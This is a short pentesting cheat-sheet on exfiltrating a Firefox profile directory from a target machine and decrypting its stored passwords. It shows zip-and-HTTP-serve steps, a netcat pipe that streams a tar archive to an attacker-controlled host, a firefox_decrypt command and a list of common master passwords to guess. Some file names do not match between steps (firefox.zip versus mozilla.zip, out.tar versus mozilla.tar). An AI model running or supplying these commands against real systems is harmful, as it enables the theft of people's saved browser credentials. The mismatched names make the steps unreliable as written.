Mozilla Pentesting
Zip
First, zip .firefox directory in target machine, and open web server to transfer the zip file to local machine.
zip -r /tmp/firefox.zip .firefox cd /tmp python3 -m http.server 8000 Copied!
In local machine, download the zip file from the remote machine, and decompress it.
wget http://<target-ip>:8000/mozilla.zip unzip mozilla.zip Copied!
Tar
If we cannot use zip, tar also can be used. In local machine, start listener for getting the archived directory. "out.tar" will be created when the remote machine will send the compressed directory.
nc -lvnp 1234 > out.tar Copied!
In remote machine, compress the directory and transfer over netcat.
tar -cf - mozilla/ | nc <local-ip> 1234 Copied!
Then, decompress it in local.
tar -xf mozilla.tar Copied!
To crack the profile of Firefox, use firefox_decrypt.
python3 firefox_decrypt.py .mozilla/firefox/<id>.default-release
Copied!
If we’ll be asked the master password and we don’t know it, try common passwords.
admin
password
password1
password123
root
Last updated